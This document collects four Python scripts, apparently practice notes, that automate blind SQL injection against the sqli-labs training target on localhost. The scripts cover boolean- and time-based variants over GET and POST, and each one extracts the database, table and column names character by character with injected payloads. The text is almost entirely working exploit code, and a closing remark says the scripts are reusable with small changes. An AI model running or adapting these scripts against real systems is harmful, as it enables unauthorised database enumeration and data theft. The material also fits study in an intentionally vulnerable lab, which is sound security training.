GET型bool注入
import requests
# Local sqli-labs practice target (Less-5, GET parameter, boolean-based blind).
baseurl = 'http://127.0.0.1/sqli-labs/Less-5/'

# Module-level state; filled in by the calls at the bottom of the script.
db_name = db_lenth = table_name = table_length = ''
columns_name = columns_length = result = ''
# Originally meant for matching on a specific marker string in the page;
# the script ends up using the response length instead, so this stays unused.
right = ''

# Sub-queries whose length and characters are recovered one position at a time:
# current schema name, its table names, its column names.
sql_payloads = [
    'select database()',
    'select group_concat(table_name) from information_schema.tables where table_schema=database()',
    'select group_concat(column_name) from information_schema.columns where table_schema=database()',
]
def dblenth(sql_payload):
    """Recover the length of the string produced by *sql_payload*.

    Candidate lengths 1..99 are tried in order. The first candidate whose
    page comes back with the 704-byte "true" body is stored in the module
    global ``db_lenth``, printed and returned. If no candidate matches the
    function falls through and returns ``None`` (the caller's ``int()`` then
    fails).
    """
    global db_lenth
    candidate = 1
    while candidate < 100:
        query = "?id=1' and length(({0}))={1}--+".format(sql_payload, candidate)
        page = requests.get(baseurl + query)
        # Response-length oracle: 704 bytes is the body size a true condition
        # yields on this lab instance (presumably measured with the commented
        # print in the original); any other deployment needs re-measuring.
        matched = len(page.text) == 704
        if matched:
            db_lenth = candidate
            print(candidate)
            return candidate
        candidate += 1
    return None
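def dbname(lenth, sql_payload):
    """Recover *lenth* characters of the string produced by *sql_payload*.

    For each position 1..lenth every printable ASCII code 32..126 is tried;
    a code whose page comes back with the 704-byte "true" body is accepted
    as the character at that position. The partial string is printed after
    each accepted character and the complete string is returned.

    Fix: ``result`` is a module global and was never cleared, so the second
    and third calls (table names, column names) returned the previous answer
    with the new one appended. It is now reset on entry; the global still
    ends up holding the most recent answer, as before.
    """
    global db_name, result
    result = ''  # reset: otherwise the previous call's answer is carried over
    for position in range(1, lenth + 1):
        for code in range(32, 127):
            url_payload = "?id=1' and ascii(substr(({0}),{1},1))={2}--+".format(sql_payload, position, code)
            res = requests.get(baseurl + url_payload)
            # Response-length oracle: a 704-byte body means the condition held
            # (value presumably measured on this lab instance).
            if len(res.text) == 704:
                result += chr(code)
                print(result)
    return result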
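# --- Database name ---
# dblenth() also stores its answer in the global db_lenth; the original relied
# on that side effect for every step below, which is why the wrong-looking
# `db_lenth` arguments still worked. The returned value is used explicitly now.
db_lenth = dblenth(sql_payloads[0])
db_name = dbname(int(db_lenth), sql_payloads[0])
print('数据库名为' + db_name)
# --- Table names ---
table_length = dblenth(sql_payloads[1])
table_name = dbname(int(table_length), sql_payloads[1])
print('表名为' + table_name)
# --- Column names ---
columns_length = dblenth(sql_payloads[2])
# Fix: the original wrote `columns_name=db_name=...`, overwriting db_name with
# the column list.
columns_name = dbname(int(columns_length), sql_payloads[2])
print('列名名为' + columns_name)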
GET型延时注入
import requests
# Local sqli-labs practice target (Less-6, GET parameter, time-based blind).
baseurl = 'http://127.0.0.1/sqli-labs/Less-6/'

# Sub-queries recovered one character at a time: current schema name,
# its table names, its column names.
sql_payloads = [
    'select database()',
    'select group_concat(table_name) from information_schema.tables where table_schema=database()',
    'select group_concat(column_name) from information_schema.columns where table_schema=database()',
]

# Module-level state; filled in by the calls at the bottom of the script.
payload = ''
db_length = db_name = ''
table_length = table_name = ''
columns_length = columns_name = ''
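def get_respone(url):
    """Return True when the GET request to *url* timed out, False otherwise.

    This is the time-based oracle: the injected condition runs ``sleep(3)``
    when true, and the 2-second client timeout turns that delay into a
    ``Timeout`` exception.

    Fix: the original caught ``Exception``, so a refused connection, a DNS
    failure or any other request error was also reported as "condition
    true" and silently produced wrong characters. Only a timeout counts as
    true now; other request failures propagate to the caller.
    """
    try:
        requests.get(url, timeout=2)
    except requests.exceptions.Timeout:
        print("......")
        return True
    return False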
def get_length(sql_payload):
    """Recover the length of the string produced by *sql_payload*.

    Candidate lengths 1..99 are tried in order; the first one whose request
    times out (i.e. the server-side sleep fired) is printed and returned.
    Returns ``None`` implicitly when nothing matches.
    """
    for candidate in range(1, 100):
        query = '?id=1"and if(length(({0}))={1},sleep(3),2)--+'.format(sql_payload, candidate)
        delayed = get_respone(baseurl + query)
        if not delayed:
            continue
        print(candidate)
        return candidate
def get_name(length, sql_payload):
    """Recover *length* characters of the string produced by *sql_payload*.

    For each position 1..length every printable ASCII code 32..126 is tried;
    a code whose request times out is appended to the answer. The partial
    answer is printed after every accepted character. Note that the inner
    loop keeps scanning the remaining codes after a match, exactly as the
    original did.
    """
    recovered = ''
    positions = range(1, length + 1)
    codes = range(32, 127)
    for position in positions:
        for code in codes:
            query = '?id=1" and if((ascii(substr(({0}),{1},1))={2}),sleep(3),1)--+'.format(sql_payload, position, code)
            delayed = get_respone(baseurl + query)
            if delayed:
                recovered = recovered + chr(code)
                print(recovered)
    return recovered
# Dump the database name, then its table list, then its column list.
db_sql, table_sql, column_sql = sql_payloads

db_length = get_length(db_sql)
db_name = get_name(int(db_length), db_sql)
print('数据库名为' + db_name)

table_length = get_length(table_sql)
table_name = get_name(int(table_length), table_sql)
print('表名为' + table_name)

columns_length = get_length(column_sql)
columns_name = get_name(int(columns_length), column_sql)
print('列名为' + columns_name)
POST型bool注入
import requests
# Local sqli-labs practice target (Less-15, POST login form, boolean-based blind).
baseurl = 'http://127.0.0.1/sqli-labs/Less-15/'

# Sub-queries recovered one character at a time: current schema name,
# its table names, its column names.
sql_payloads = [
    'select database()',
    'select group_concat(table_name) from information_schema.tables where table_schema=database()',
    'select group_concat(column_name) from information_schema.columns where table_schema=database()',
]

# Module-level state; filled in by the calls at the bottom of the script.
db_name = db_lenth = ''
table_name = table_length = ''
columns_name = columns_length = ''
def post_length(sql_payload):
    """Recover the length of the string produced by *sql_payload*.

    Candidate lengths 1..99 are submitted through the ``uname`` field of the
    login form; the first one whose response body is 1492 bytes (the size
    this lab returns for a true condition) is printed and returned. Returns
    ``None`` implicitly when nothing matches.
    """
    form = {'uname': '', 'passwd': '1', 'submit': 'Submit'}
    for candidate in range(1, 100):
        form['uname'] = "1'or length(({0}))={1}#".format(sql_payload, candidate)
        reply = requests.post(baseurl, data=form)
        # Response-length oracle; 1492 was presumably measured on this instance.
        if len(reply.text) != 1492:
            continue
        print(candidate)
        return candidate
def post_name(sql_payload, length):
    """Recover *length* characters of the string produced by *sql_payload*.

    For each position 1..length the codes 32..129 are tried through the
    ``uname`` form field; a code whose response body is 1492 bytes is
    appended to the answer, which is printed after every accepted
    character. Codes 127..129 lie outside printable ASCII; the range is kept
    as the original had it.
    """
    recovered = ''
    form = {'uname': '', 'passwd': '1', 'submit': 'Submit'}
    for position in range(1, length + 1):
        for code in range(32, 130):
            form['uname'] = "1'or ascii(substr(({0}),{1},1))={2}#".format(sql_payload, position, code)
            reply = requests.post(baseurl, data=form)
            # Response-length oracle (1492 bytes = condition true on this instance).
            if len(reply.text) == 1492:
                recovered = recovered + chr(code)
                print(recovered)
    return recovered
# Dump the database name, then its table list, then its column list.
db_sql, table_sql, column_sql = sql_payloads

db_lenth = post_length(db_sql)
db_name = post_name(db_sql, db_lenth)
print('数据库名为' + db_name)

table_length = post_length(table_sql)
table_name = post_name(table_sql, table_length)
print('表名为' + table_name)

columns_length = post_length(column_sql)
columns_name = post_name(column_sql, columns_length)
print('列名名为' + columns_name)
POST型延时注入
import requests
# Local sqli-labs practice target (Less-15, POST login form, time-based blind).
baseurl = 'http://127.0.0.1/sqli-labs/Less-15/'

# Sub-queries recovered one character at a time: current schema name,
# its table names, its column names.
sql_payloads = [
    'select database()',
    'select group_concat(table_name) from information_schema.tables where table_schema=database()',
    'select group_concat(column_name) from information_schema.columns where table_schema=database()',
]

# Module-level state; filled in by the calls at the bottom of the script.
db_name = db_lenth = ''
table_name = table_length = ''
columns_name = columns_length = ''
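def post_length(sql_payload):
    """Recover the length of the string produced by *sql_payload*.

    Candidate lengths 1..99 are submitted through the ``uname`` field of the
    login form; the injected condition runs ``sleep(3)`` when true, and the
    2-second client timeout turns that delay into a ``Timeout``. The first
    candidate that times out is printed and returned; ``None`` is returned
    implicitly when nothing matches.

    Fix: the nested helper caught ``Exception``, so a refused connection or
    any other request error was also reported as "condition true" and gave a
    wrong length. Only a timeout counts as true now; other failures
    propagate. The form data is passed to the helper explicitly instead of
    being picked up from the enclosing scope.
    """
    def post_respone(url, form):
        # True only when the request timed out (server-side sleep fired).
        try:
            requests.post(url, data=form, timeout=2)
        except requests.exceptions.Timeout:
            print("......")
            return True
        return False

    for i in range(1, 100):
        payload = "1'or if(length(({0}))={1},sleep(3),2)#".format(sql_payload, i)
        data = {'uname': payload, 'passwd': '1', 'submit': 'Submit'}
        if post_respone(baseurl, data):
            print(i)
            return i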
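def post_name(sql_payload, length):
    """Recover *length* characters of the string produced by *sql_payload*.

    For each position 1..length the codes 32..129 are submitted through the
    ``uname`` form field; a code whose request times out (the server-side
    ``sleep(3)`` fired against the 2-second client timeout) is appended to
    the answer, which is printed after every accepted character. Codes
    127..129 lie outside printable ASCII; the range is kept as the original
    had it.

    Fix: the nested helper caught ``Exception``, so a refused connection or
    any other request error was also reported as "condition true" and
    produced wrong characters. Only a timeout counts as true now; other
    failures propagate. The form data is passed to the helper explicitly
    instead of being picked up from the enclosing scope.
    """
    def post_respone(url, form):
        # True only when the request timed out (server-side sleep fired).
        try:
            requests.post(url, data=form, timeout=2)
        except requests.exceptions.Timeout:
            print("......")
            return True
        return False

    result = ''
    for i in range(1, length + 1):
        for j in range(32, 130):
            payload = "1'or if((ascii(substr(({0}),{1},1))={2}),sleep(3),1)#".format(sql_payload, i, j)
            data = {'uname': payload, 'passwd': '1', 'submit': 'Submit'}
            if post_respone(baseurl, data):
                result += chr(j)
                print(result)
    return result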
# Dump the database name, then its table list, then its column list.
db_sql, table_sql, column_sql = sql_payloads

db_lenth = post_length(db_sql)
db_name = post_name(db_sql, db_lenth)
print(db_name)

table_length = post_length(table_sql)
table_name = post_name(table_sql, table_length)
print('表名为' + table_name)

columns_length = post_length(column_sql)
columns_name = post_name(column_sql, columns_length)
print('列名名为' + columns_name)
这四个脚本其实大多是一样的，稍微改动一些就可以复用，整体思路都差不多。